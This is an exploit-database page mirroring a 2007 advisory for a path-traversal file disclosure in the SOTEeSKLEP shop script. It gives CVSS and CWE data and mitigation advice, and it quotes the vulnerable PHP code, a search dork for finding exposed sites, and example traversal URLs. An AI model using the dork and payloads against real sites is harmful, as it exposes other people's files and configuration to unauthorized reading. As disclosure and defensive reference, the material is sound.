header-logo
Suggest Exploit
vendor:
SOTEeSKLEP
by:
dun
7.5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: SOTEeSKLEP
Affected Version From: 3.1RC8
Affected Version To: 3.5RC9
Patch Exists: NO
Related CWE:
CPE: sote:esklep
Metasploit:
Other Scripts:
Platforms Tested:
2007

SOTEeSKLEP Remote File Disclosure Vulnerability

The vulnerability allows an attacker to disclose arbitrary files on the remote system. By manipulating the 'file' parameter in the '/go/_files/' directory, an attacker can access files outside of the intended directory. This can lead to the disclosure of sensitive information and potentially compromise the system.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate file paths before accessing them. Additionally, restricting access to sensitive files and directories can help prevent unauthorized access.
Source

Exploit-DB raw data:

SOTEeSKLEP Remote File Disclosure Vulnerability

Script : SOTEeSKLEP

Versions: 3.1RC8, 3.5RC1, 3.5RC4, 3.5RC9, and i think other.

Site : http://www.sote.pl

Bug:

...
if (! empty($_REQUEST["file"])) { $file=$_REQUEST['file']; }
...
$file_path="$DOCUMENT_ROOT/themes/_$config->lang/_html_files/$file";
if (file_exists($file_path)) { $fd=fopen($file_path,"r");
$data=fread($fd,filesize($file_path));
print $data;
fclose($fd);
}
...

Dork: inurl:"/go/_files/?file="

Examples:
http://???/go/_files/?file=./.././.././.././
http://???/go/_files/?file=./.././.././.././go/_files/index.php

Discovered by dun
2007.08.11

# milw0rm.com [2007-08-13]

Navigation

Suggest Exploit

Services By CQR